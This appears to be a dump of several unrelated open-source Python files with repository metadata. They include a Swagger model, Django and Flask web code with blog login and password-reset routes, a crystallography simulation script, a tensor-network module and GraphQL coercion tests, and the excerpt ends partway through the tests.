print(tuple(zip(a,b)))
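# zip truncates to the shorter tuple, so this prints (('Hi', 'VL'), ('Bye', 'Meet you'))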
|
[
"noreply@github.com"
] |
vlakhani28.noreply@github.com
|
9a4bf24da3b560bcf2a827254ecb212a9cd43d22
|
d8083b945e1527f66ecdd321961a4453b8f068b1
|
/swagger_server/models/inline_response200.py
|
0a9b6d202cdaad66150263d15a2dbda6465c2745
|
[
"Apache-2.0"
] |
permissive
|
SJoshua/Time-Capsule-Post-2019-API
|
762fcbb97071b1ee07095f1619242198e789a014
|
0e613c71c8e1adf0521ddcc4ff9bde2fd8f39193
|
refs/heads/master
| 2020-09-24T09:55:57.172383
| 2019-12-04T14:39:18
| 2019-12-04T14:39:18
| 225,734,275
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class InlineResponse200(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, participated: bool=None): # noqa: E501
"""InlineResponse200 - a model defined in Swagger
:param participated: The participated of this InlineResponse200. # noqa: E501
:type participated: bool
"""
self.swagger_types = {
'participated': bool
}
self.attribute_map = {
'participated': 'participated'
}
self._participated = participated
@classmethod
def from_dict(cls, dikt) -> 'InlineResponse200':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The inline_response_200 of this InlineResponse200. # noqa: E501
:rtype: InlineResponse200
"""
return util.deserialize_model(dikt, cls)
@property
def participated(self) -> bool:
"""Gets the participated of this InlineResponse200.
:return: The participated of this InlineResponse200.
:rtype: bool
"""
return self._participated
@participated.setter
def participated(self, participated: bool):
"""Sets the participated of this InlineResponse200.
:param participated: The participated of this InlineResponse200.
:type participated: bool
"""
self._participated = participated
|
[
"JoshuaSRKF@gmail.com"
] |
JoshuaSRKF@gmail.com
|
f6956a6c75f50380e9dd6207ef59e2de012eb3a2
|
1d88bd336207a12d527ecdff4291ec228de21ed4
|
/rangoapp/urls.py
|
907a2ffc44651be5ef6b2ad5482ec7ca25651331
|
[] |
no_license
|
fonque/rango
|
954e5944c4ac17ec9b75852333a1d38a1b6789e3
|
2038c6dbc1130e21ee0e12ab5f218b1896126149
|
refs/heads/master
| 2021-01-22T23:48:09.552799
| 2014-04-08T13:10:50
| 2014-04-08T13:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django.conf.urls import patterns, url
from rangoapp import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^about/', views.about, name='about'),
)
|
[
"fonque@gmail.com"
] |
fonque@gmail.com
|
a9a26c07e3165bc9c40e52bc1c5abc22f7313e9e
|
57bd9124c070a25a649a8859f010ec26216c4535
|
/utils/reflection_counter/prep_stills_image.v5-1.py
|
c19a227a75bf74d1e83457067b6047e3df70c409
|
[
"Apache-2.0"
] |
permissive
|
beamline-i24/Serial_processing_scripts
|
522812b2964cbaa5a2fe3c0a6483df5cb691af0e
|
ca97e3cd7ba991636171eafa126dc6e1aa4c53cc
|
refs/heads/master
| 2020-03-21T05:56:28.491220
| 2018-06-28T22:41:52
| 2018-06-28T22:41:52
| 138,189,548
| 0
| 0
|
Apache-2.0
| 2018-06-28T22:41:53
| 2018-06-21T15:32:51
|
Python
|
UTF-8
|
Python
| false
| false
| 8,846
|
py
|
#modules
import pandas as pd
import numpy as np
import math as m
import timeit
import itertools
from cctbx import miller
from cctbx import crystal
import matplotlib.pyplot as plt
import pylab
import re
#my modules
import xtal_trig_1 as trig
import unit_cell_check as check
import space_group as sp
import pdb_header_scrub as pdb
#functions
def check_xtal_input( spacegroup, a, b, c, alpha, beta, gamma ):
try:
if sp.lattice(spacegroup) == "cubic":
return check.cubic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "tetragonal":
return check.tetragonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "hexagonal":
return check.hexagonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "trigonal":
return check.trigonal( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "orthorhombic":
return check.orthorhombic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "monoclinic":
return check.monoclinic( a, b, c, alpha, beta, gamma )
elif sp.lattice(spacegroup) == "triclinic":
return check.triclinic( a, b, c, alpha, beta, gamma )
else:
raise ValueError, "this does not appear to be a known spacegroup"
except ValueError, value:
print value
def gen_hkl( spacegroup, a, b, c, alpha, beta, gamma, d_min ):
# generate hkls based on spacegroup, unit cell dimensions and d_min
ms = miller.build_set(
crystal_symmetry=crystal.symmetry(
space_group_symbol = "P1",
unit_cell = ( a, b, c, alpha, beta, gamma ) ),
anomalous_flag = True,
d_min = d_min,
d_max = 50,
)
hkl_list = list( ms.indices() )
# put hkl_list in a pandas dataframe
cols = [ "h", "k", "l" ]
df = pd.DataFrame( hkl_list, columns=cols )
return df
def scale_lattice( spacegroup, a, b, c, alpha, beta, gamma, lattice ):
# scaler for spacegroup
a_star = trig.operators( a, b, c, alpha, beta, gamma, "a*" )
b_star = trig.operators( a, b, c, alpha, beta, gamma, "b*" )
c_star = trig.operators( a, b, c, alpha, beta, gamma, "c*" )
scaler = np.array( [ a_star, b_star, c_star ] )
list_hkl = np.multiply( lattice, scaler )
return list_hkl
def omega_d( h, k, l, wavelength, variable ):
#import hkls as array
hkl = np.array( [ h, k, l ] )
# transpose array
hkl = np.transpose( hkl )
# calculate length of vector
d_star = np.linalg.norm( hkl, axis=1 )
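    # Bragg's law: sin(theta) = lambda / (2 d) = lambda * d_star / 2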
# calculate ewald omega for vector of given length
omega = np.degrees( np.arcsin( ( d_star * wavelength ) / 2 ) )
if variable == "d_star":
return d_star
elif variable == "omega":
return omega
def apply_d_omega( lattice, wavelength ):
# hkl array
df = lattice
# calculate ewald omegas using omega function
df[ "ewald_omega" ] = omega_d( df[ "h" ].values, df[ "k" ].values, df[ "l" ].values, wavelength, "omega" )
return df
def det_vector_generator():
    # generate a uniformly distributed random point on the unit sphere
phi = np.random.uniform( 0, 2*m.pi )
cos_theta = np.random.uniform( -1, 1 )
theta = m.acos( cos_theta )
r = 1
# generate x,y,z coordinates
x = r * m.sin( theta) * m.cos( phi )
y = r * m.sin( theta) * m.sin( phi )
z = r * m.cos( theta )
det = np.array( [ [ x, y, z ] ] )
return det
def det_hkl_dot( det, h, k, l ):
# (axb)/(a.b) = tan omega
# import hkls as array
hkl = np.array( [ h, k, l ] )
# calculate dot product between det vector and hkl
dot = np.dot( det, hkl )
# transpose hkl to vectorise np.cross
hkl = np.transpose( hkl )
# cross product vector of det vector and hkl
cross = np.cross( det, hkl )
# mod of cross
cross_mod = np.linalg.norm( cross, axis=1 )
# transpose cross_mod to vectorise np.arctan2
cross_mod = np.transpose( cross_mod )
# anti_omega = angle between det vector and hkl
anti_omega = np.arctan2( cross_mod, dot )
# tranpose for vectorisation
anti_omega = np.transpose( anti_omega )
# omega = anit omega - 90
omega = 90 - np.degrees( anti_omega )
return abs( omega )
def spot_hist_plt( spot_df ):
frequency = spot_df[ "spots" ].values
plt.hist( frequency )
plt.title( "frequency of bragg reflections per image" )
plt.xlabel( "no. of bragg candidates per image" )
plt.ylabel( "frequency" )
pylab.show()
def hkl_plot( df_hkl ):
df = pd.DataFrame()
bins = 50
bin_range, labels = pd.cut( df_hkl[ "d_star" ], bins=bins, retbins=True )
df_hkl[ "bin" ] = pd.cut( df_hkl[ "d_star" ], bins=len( labels ), labels=labels )
df[ "frequency" ] = df_hkl.groupby( "bin" )[ "frequency" ].mean()
frequency = df[ "frequency" ].values
d_hkl = df.index.values
plt.scatter( d_hkl, frequency )
plt.title( "frequency of bragg reflections per image" )
plt.xlabel( r'$\sin\theta/2\lambda$' )
plt.ylabel( "frequency" )
pylab.show()
def image_max( spacegroup, ano ):
m = sp.m( spacegroup )
max = 562.5 / m
#max = 100 / m
try:
if ano == "True":
return max
elif ano == "False":
return max / 2
else:
raise ValueError, "ano must be either True or False"
    except ValueError, value:
        print value
def main( wavelength ):
# check input spacegroup and unit cell dimensions make sense
if check_xtal_input( spacegroup, a, b, c, alpha, beta, gamma ) == True:
# define precision when calculating hkls on the ewald sphere 0 = no decimal place, 1 = 1 decimal place etc
precision = 3
mosaicity = 0.02
# generate hkl lattice
print "generating hkls"
df_hkl = gen_hkl( spacegroup, a, b, c, alpha, beta, gamma, d_min )
# scale hkls
print "scale hkls"
df = scale_lattice( spacegroup, a, b, c, alpha, beta, gamma, df_hkl )
# generate omegas
print "calculating ewald omegas"
df = apply_d_omega( df, wavelength )
# variable for while loop
df[ "frequency" ] = 0
spots = 0
images = 0
mean = df[ "frequency" ].mean()
max = image_max( spacegroup, ano )
print max
spot_no_2 = np.array( [ [ 0 ] ] )
# returns output of hkl where the detector vector omega = ewald omega
while ( mean < max ):
#print "new image"
# new detector vector
det_vector = det_vector_generator()
# creates a detector/hkl* omega column
df[ "det_hkl_omega" ] = det_hkl_dot( det_vector, df[ "h" ].values, df[ "k" ].values, df[ "l" ].values )
# compared ewald omega and detect omega - write +1 to frequency column
df = df.round( { "ewald_omega" : precision, "det_hkl_omega" : precision } )
#
ewald_low = df.ewald_omega - mosaicity
ewald_high = df.ewald_omega + mosaicity
# increase hkls hit by 1
df[ "frequency_1" ] = np.where( ( ewald_low <= df.det_hkl_omega ) & ( df.det_hkl_omega <= ewald_high ), 1, 0 )
df[ "frequency" ] = df[ "frequency" ] + df[ "frequency_1" ]
# print outputs for while loop
images = images + 1
mean = df[ "frequency" ].mean()
spots = df[ "frequency_1" ].sum()
            # while-loop housekeeping
print "image = {0}, mean = {1}, spots on image = {2}".format( images, mean, spots )
spot_no = np.array( [ [ spots ] ] )
spot_no_2 = np.concatenate( ( spot_no_2, spot_no ), axis=0 )
spot_df = pd.DataFrame( spot_no_2, columns=[ "spots" ] )
# plot hist of spots
spot_hist_plt( spot_df )
spot_df.to_csv( "spot_hist.txt", sep="\t", mode="w" )
#hkl_plot( df_hkl )
return images
def looper():
cycle = 0
list = np.array( [ [ ] ] )
while ( cycle < 1 ):
print "cycle {0}".format( cycle )
images = main( wavelength )
list_1 = np.array( [ [ images ] ] )
list = np.concatenate( ( list, list_1 ), axis=1 )
cycle = cycle + 1
list = np.transpose( list )
df = pd.DataFrame( list, columns=[ "no. of images" ] )
print df
spacegroup = "P213"
a = 96.5
b = 96.5
c = 96.5
alpha = 90
beta = 90
gamma = 90
wavelength = 0.9686
energy = 12800
ano = "False"
d_min = 1.5
def wrapper(function, *args):
def wrapped():
return function(*args)
return wrapped
wrapped=wrapper( looper )
print timeit.timeit(wrapped, number=1) #for 1 iteration
|
[
"web66492@i24-ws006.diamond.ac.uk"
] |
web66492@i24-ws006.diamond.ac.uk
|
52f01d36054ae48e366e154ca30c5a2e6398678b
|
acf7422d7e30b4fab49870a6db60952799edc52b
|
/network/TNRnet.py
|
ec7274cbf048ebd096db6a0801ee66f17a86b2b8
|
[
"MIT"
] |
permissive
|
sailfish009/IsoTensor
|
361832b3ccd47f2cf190c960594b6df5927284c7
|
aa797678fc16071667dd0255c42bf0b925ad09dc
|
refs/heads/master
| 2023-08-15T10:06:14.601510
| 2021-10-05T05:06:39
| 2021-10-05T05:06:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
import sys
sys.path.append("..")
import torch
from lib import functional as func
from layer import TNRlayer
class TNRNet(torch.nn.Module):
r"""A standard TNR coarse-graining network.
"""
def __init__(self, chi_HV, chi_list=(8,8,8,8), dtype=torch.double, totlv=8):
super().__init__()
self.chi_list = chi_list
self.totlv = totlv
self.chi_HV = chi_HV
self.dtype = dtype
self.layers_tnr = []
layers = [TNRlayer.LayerGen(), TNRlayer.LayerDiv()]
for i in range(totlv):
self.layers_tnr.append(TNRlayer.LayerTNR(chi_HV, chi_list, dtype))
layers.append(self.layers_tnr[-1])
layers.append(TNRlayer.LayerDiv())
_,_,_,_, chiAH, chiAV = func.get_chi(chi_HV, chi_list)
chi_HV = (chiAH, chiAV)
self.net = torch.nn.ModuleList(layers)
def forward(self, x):
for layer in self.net:
x = layer(x)
return x
def sum_lnZ(self, A_top):
r"""Compute the lnZ at the top layer.
"""
lnZ = torch.log(torch.einsum('abab', A_top))
i = 0
for lay in reversed(self.net):
if isinstance(lay, TNRlayer.LayerDiv):
lnZ += 4 ** i * torch.log(lay.norm)
i += 1
lnZ = lnZ / 4 ** (self.totlv)
return lnZ
|
[
"xwkgch@gmail.com"
] |
xwkgch@gmail.com
|
559577f8d534401d2b86283e76bc7d558264b5d0
|
da67476dcc50c8a2f55b4be3ce6db0daf6a6f86c
|
/esl/mathematics/variable.py
|
53a7e3b92ee378929a0f5d7c9c269d371736b560
|
[
"Apache-2.0"
] |
permissive
|
fagan2888/ESL
|
82a9add84023500a5d290f8f7304f9d670c0d0d9
|
24ffa903e8c5b9e725eed9861623d4b6a4a205a2
|
refs/heads/master
| 2022-04-17T12:41:22.337750
| 2020-04-16T03:24:28
| 2020-04-16T03:24:28
| 256,305,955
| 1
| 0
|
Apache-2.0
| 2020-04-16T19:08:21
| 2020-04-16T19:08:21
| null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
class Variable:
pass
|
[
"scholl.maarten@gmail.com"
] |
scholl.maarten@gmail.com
|
567283eb0c088b1d94bef402441630ff0a7f61db
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_1/511.py
|
d2093e878861721d76b87fb1d507304ffdd37355
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,971
|
py
|
import os
import sys
import getopt
def CommandLineOperations(argv):
"""
    Main method: reads arguments from the command prompt, reads the input
    data file, processes the data, and writes the result to the output file.
argv command prompt arguments
"""
outputFile = "result.out"
inputFile = None
scriptName = argv[0]
del argv[0]
try:
argTup = getopt.getopt(argv, "di:o:", ["dist", "input=", "output="])
try:
for opt, val in argTup[0]:
if opt in ("-d", "-dist"):
makeExe(scriptName)
sys.exit(0)
if opt in ("-i", "-input="):
inputFile = val
if opt in ("-o", "-output="):
outputFile = val
#print inputFile, outputFile
except ValueError:
raise getopt.GetoptError("ERROR: Input File is requited")
if not inputFile:
raise getopt.GetoptError("ERROR: Input File is requited")
except getopt.GetoptError:
usage()
sys.exit(2)
return (inputFile, outputFile)
def solveProblem(argv, method, linesPerCase = 1, inputFile = None, outputFile = None):
    """
    Method for solving the problem.
    param inputFile Filename of input file with input data
    param outputFile Filename of output file to write resulting output data
    """
    if inputFile is None and outputFile is None:
        inputFile, outputFile = CommandLineOperations(argv)
    inputFile = os.path.normpath(inputFile)
    outputFile = os.path.normpath(outputFile)
f = open(inputFile, "r")
fw = open(outputFile, "w")
line = f.readline()
casesNum = int(line)
for i in range(1, casesNum+1):
if i > 1:
fw.write("\n")
case = {}
for k in range(i, i+linesPerCase):
sNum = int(f.readline().replace("\n", ""))
sArr = []
for sN in range(0, sNum):
sLine = f.readline().replace("\n", "")
sArr.append(sLine)
qNum = int(f.readline().replace("\n", ""))
qArr = []
for qN in range(0, qNum):
qLine = f.readline().replace("\n", "")
qArr.append(qLine)
case = {"s":sArr, "q":qArr}
i = k
result = method(case)
fw.write("Case #%d: %s" % (i, result))
fw.close()
f.close()
def universeCaseMethodOld(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
counter = []
for s in sArr:
counter.append(qArr.count(s))
answer = min(counter)
return answer
def universeCaseMethod(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
sArrTemp = sArr
counter = 0
incDict = {}
ind = 0
for q in qArr:
if incDict.has_key(q) == False:
incDict[q] = 0
incDict[q] += 1
#print q, incDict
if len(incDict) == len(sArr):
counter += 1
incDict = {}
if ind > 1 and incDict == {} :
if qArr[ind-2] == q:
counter += 1
#print "plus one"
ind += 1
return counter
def findBestEngine(sArr, qArr, currEngine):
countDict = {}
switch = False
qArrNext = qArr
currLine = qArr[0]
if currLine == currEngine:
switch = True
#qArrNext = qArr[1:]
if switch or currEngine == None:
currEngineChanged = False
sArrLen = len(sArr)
#print sArrLen
for q in qArrNext:
countDict[q] = 1
if len(countDict) == sArrLen:
currEngine = q
currEngineChanged = True
break
if not currEngineChanged:
#print "second try"
lastItems = []
currMin = 0
for s in sArr:
currCount = qArrNext.count(s)
if currMin >= currCount:
currEngine = s
currEngineChanged = True
if currEngineChanged and currEngine == currLine:
currEngineChanged = False
#print "not good"
i = 0
for q in qArrNext:
if q == currEngine:
currEngine = qArrNext[i-1]
currEngineChanged = True
break
i += 1
if not currEngineChanged:
for q in qArr:
if q != currEngine:
currEngine = q
currEngineChanged = True
break
return currEngine, switch
def universeCaseMethodV2(caseLines):
sArr = caseLines.get("s")
qArr = caseLines.get("q")
index = 0
counter = 0
currEngine = None
for q in qArr:
currEngine, switch = findBestEngine(sArr, qArr[index:], currEngine)
#print "Line: %s, Current: %s, Switch: %s" % (q, currEngine, switch)
if switch:
counter += 1
index += 1
return counter
if __name__ == "__main__":
case1 = {"s":[ "Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan"],
"q":[ "Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan",
"Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan",
"Googol Haiti",
"Googol Montserrat",
"Googol Kazakhstan"]}
case2 = {"s":["Googol Rwanda",
"Googol San Marino"],
"q":["Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino",
"Googol Rwanda",
"Googol San Marino"]}
case3 = {"s":["Saporo",
"Googol New Zealand",
"Googol South Africa"],
"q":["Googol New Zealand",
"Saporo",
"Googol New Zealand",
"Googol New Zealand",
"Googol New Zealand",
"Googol New Zealand",
"Googol South Africa",
"Googol South Africa",
"Googol South Africa",
"Googol South Africa",
"Saporo",
"Googol South Africa"]}
## print findBestEngine(["Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan"],
## [ "Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan",
## "Googol Haiti",
## "Googol Montserrat"][0:],
## None)
##
## print findBestEngine(["Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan"],
##
## [ "Googol Haiti",
## "Googol Montserrat",
## "Googol Kazakhstan",
## "Googol Haiti",
## "Googol Montserrat"][0:],
## "Googol Haiti")
#print universeCaseMethodV2(case3)
solveProblem([], universeCaseMethodV2, inputFile = "c://Other//GJC//A-large.in", outputFile = "c://Other//GJC//A-large.out")
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
99c671a7ef02afe8c18f1b85bef3164626b2ca22
|
8d5826a8d2737dab73f1113de4666ff92b9da891
|
/accounts/migrations/0010_auto_20200506_1504.py
|
6e5da8fb78af7e462e6d4370c043cba354d1b81f
|
[] |
no_license
|
ShubhamDev-AI/instagram-clone
|
972ef651cbedf1996b47f7d28aa9f6219394068d
|
09e07b0f6377b848fa75bd5dc623efa98d759559
|
refs/heads/master
| 2022-12-27T03:11:02.839995
| 2020-10-14T20:08:13
| 2020-10-14T20:08:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
# Generated by Django 3.0.6 on 2020-05-06 15:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0009_auto_20200506_1105'),
]
operations = [
migrations.AlterField(
model_name='user',
name='profile',
field=models.ImageField(blank=True, null=True, upload_to='user_profiles/'),
),
]
|
[
"michel3153@gmail.com"
] |
michel3153@gmail.com
|
33eef287fd949381adf9601eda626568e80258da
|
00b9d05d36e403aafe33becfd738bedb4e6927ae
|
/Day3/ProcessFileLogger.py
|
d332c117716da51bd887c4dc9cbc9d1297ca2218
|
[] |
no_license
|
ShahUjval/Python
|
9383b2b4f5c519096a4496db3862d1adaffc2ea2
|
e49d9f148a08b8e8bd8e5d58aa5c2b9ee1984523
|
refs/heads/master
| 2021-01-20T20:18:06.616409
| 2016-06-03T09:37:38
| 2016-06-03T09:37:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
import logging
import multiprocessing

# application-wide logger: configure once here, then fetch with getLogger('a')
base = logging.getLogger('a')
base.setLevel(logging.DEBUG)
fh = logging.FileHandler('a.log')
fh.setFormatter(logging.Formatter('%(asctime)s : %(name)s :%(message)s'))
base.addHandler(fh)  # attach the handler, otherwise nothing is written to a.log
|
[
"shah.ujval@gmail.com"
] |
shah.ujval@gmail.com
|
f8a12215603653794aa51726f6069f9f2f908477
|
fe650dd66d75df46005d255822da7c303619ba3f
|
/backend/app.py
|
6d21f1cb1acec16e4664eb0d831b6ef20c13fb4c
|
[] |
no_license
|
Ines923/FireApp2.0
|
55e654b54c7642466b9b63e600574fd22a206d57
|
5b71a81edbaf3bbb273492705d48251f2baa64ac
|
refs/heads/main
| 2023-03-20T19:42:18.395281
| 2021-03-16T06:45:37
| 2021-03-16T06:45:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
import os
from flask import Flask
from flask_cors import CORS
from backend.controllers import *
# Register the application
app = Flask(__name__)
# TODO: Tech Debt
# - CORS Should be specified at the host level per environment, not a global free-for-all.
CORS(app)
# Register all controllers individually
app.register_blueprint(existing_requests_bp)
app.register_blueprint(new_request_bp)
app.register_blueprint(recommendation_bp)
app.register_blueprint(shift_request_bp)
app.register_blueprint(vehicle_request_bp)
app.register_blueprint(volunteer_bp)
app.register_blueprint(volunteer_all_bp)
app.register_blueprint(volunteer_availability_bp)
app.register_blueprint(volunteer_preferred_hours_bp)
app.register_blueprint(volunteer_shifts_bp)
app.register_blueprint(volunteer_status_bp)
@app.route('/')
def main():
return {
'status': 'OK',
}
if __name__ == '__main__':
import logging
logging.basicConfig(filename='error.log', level=logging.DEBUG)
app.run(host='0.0.0.0')
|
[
"michaelb@altis.com.au"
] |
michaelb@altis.com.au
|
8fa0640a76846060127216e2e48716869c809a01
|
7f1c329bde20e0ee54a014ce0abcbf2c6f68d33e
|
/Flask/Blog/user/routes.py
|
82776b92d5b3d736c0b2869b0fc4ff6370b98b84
|
[
"MIT"
] |
permissive
|
LieonShelly/PythonFun
|
9a068c18efb4c98deef2bc1e7792c4b487c22f0c
|
811760d368885109f9359c2663d8ce74886f6ad6
|
refs/heads/master
| 2020-03-30T16:54:29.799783
| 2018-12-25T09:13:53
| 2018-12-25T09:13:53
| 151,432,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,672
|
py
|
from flask import Flask, render_template, Response, redirect, flash, url_for, request, abort, Blueprint
from flask_login import current_user, login_user, logout_user, login_required, logout_user
from Blog.user.forms import RegistrationForm, LoginForm, UpdateAccountForm, RequestResetForm, ResetPasswordForm
from Blog.post.forms import PostForm
from Blog.user.models import User
from Blog import bcrypt, db
from Blog.post.models import Posts
import secrets
import os, json
from PIL import Image
from Blog.user.utls import save_picture, sende_email
user = Blueprint('user', __name__)
@user.route("/user/<string:username>")
def user_posts(username):
page = request.args.get('page', 1, type=int)
user = User.query.filter_by(username=username).first_or_404()
posts = Posts.query.filter_by(author=user).order_by(Posts.date_posted.desc()).paginate(page = page, per_page = 5)
return render_template('user_posts.html', posts=posts, user=user)
@user.route("/rest_password", methods=['GET', 'POST'])
def rest_request():
if current_user.is_authenticated:
return redirect(url_for('main.home'))
form = RequestResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
sende_email(user)
flash('An email has been sent with instructions to reset your password.', 'info')
        return redirect(url_for('user.login'))
return render_template('reset_request.html', title = "Reset Password", form=form)
@user.route("/rest_password/<string:token>", methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('main.home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid or expired token', 'warning')
        return redirect(url_for('user.rest_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
        hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
        user.password = hashed_password
        db.session.commit()
        flash('Your password has been updated! You are now able to log in', 'success')
return redirect(url_for('user.login'))
    return render_template('reset_token.html', title='Reset Password', form=form)
@user.route('/register', methods=["GET", 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('main.home'))
form = RegistrationForm()
if form.validate_on_submit():
        hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
        user = User(username=form.username.data, email=form.email.data, password=hashed_password)
db.session.add(user)
db.session.commit()
flash('Your account has been created! You are now able to log in', 'success')
return redirect(url_for('user.login'))
return render_template('register.html', title="register", form=form)
@user.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
        return redirect(url_for('main.home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('main.home'))
else:
flash('Login Unsuccessful. Please check email and password', 'danger')
return render_template('login.html', title="login", form=form)
@user.route('/logout')
def logout():
logout_user()
return redirect(url_for('main.home'))
@user.route('/account', methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
if form.picture.data:
picture_file = save_picture(form.picture.data)
current_user.image_file = picture_file
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated!', 'success')
return redirect(url_for('user.account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
image_file = url_for('static', filename='profile_pics/' + current_user.image_file)
return render_template('account.html',
title='account',
image_file=image_file,
form=form)
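# For reference, User.verify_reset_token used in reset_token() is typically
# implemented with itsdangerous. A sketch under that assumption (the real
# method lives in Blog/user/models.py):
#
# from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
#
# class User(db.Model):
#     def get_reset_token(self, expires_sec=1800):
#         s = Serializer(current_app.config['SECRET_KEY'], expires_sec)
#         return s.dumps({'user_id': self.id}).decode('utf-8')
#
#     @staticmethod
#     def verify_reset_token(token):
#         s = Serializer(current_app.config['SECRET_KEY'])
#         try:
#             user_id = s.loads(token)['user_id']
#         except Exception:
#             return None
#         return User.query.get(user_id)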
|
[
"lieoncx@gmail.com"
] |
lieoncx@gmail.com
|
2bfb230ec6c964e505ddc8777dd74a8e5934253d
|
efcd21234f3291e8fc561f49a7c88fc57a63e952
|
/tests/functional/coercers/test_coercer_list_non_null_int_field.py
|
121bc4466cfd5f6984311669f1d13c78caf1299a
|
[
"MIT"
] |
permissive
|
tartiflette/tartiflette
|
146214a43847d2f423bf74594643c1fdefc746f1
|
421c1e937f553d6a5bf2f30154022c0d77053cfb
|
refs/heads/master
| 2023-09-01T02:40:05.974025
| 2022-01-20T14:55:31
| 2022-01-20T14:55:31
| 119,035,565
| 586
| 39
|
MIT
| 2023-09-11T07:49:27
| 2018-01-26T09:56:10
|
Python
|
UTF-8
|
Python
| false
| false
| 18,253
|
py
|
import pytest
from tests.functional.coercers.common import resolve_list_field
@pytest.mark.asyncio
@pytest.mark.ttftt_engine(
name="coercion",
resolvers={"Query.listNonNullIntField": resolve_list_field},
)
@pytest.mark.parametrize(
"query,variables,expected",
[
(
"""query { listNonNullIntField }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query { listNonNullIntField(param: null) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query { listNonNullIntField(param: [null]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < param > of non-null type < Int! > must not be null.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 29}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
(
"""query { listNonNullIntField(param: 10) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13]"}},
),
(
"""query { listNonNullIntField(param: [10]) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13]"}},
),
(
"""query { listNonNullIntField(param: [10, null]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < param > of non-null type < Int! > must not be null.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 29}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
